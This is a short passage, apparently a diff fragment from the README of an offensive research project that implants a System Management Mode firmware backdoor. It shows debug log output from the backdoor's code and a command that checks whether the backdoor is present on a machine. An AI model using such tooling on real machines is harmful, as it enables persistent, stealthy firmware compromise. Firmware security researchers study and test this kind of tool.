Cr4sh/SmmBackdoorNg/README.md

 00000022 - backdoor.c(1328) : new_SetVirtualAddressMap()
 00000023 - backdoor.c(1369) : New address of the resident image is 0xfffffffeec79f000
 ```

+Check for responding backdoor and show basic information about System Management Mode execution environment:

 ```
 # python2 smm_backdoor.py --use-timer --test
 [+] Checking if SMM backdoor is present...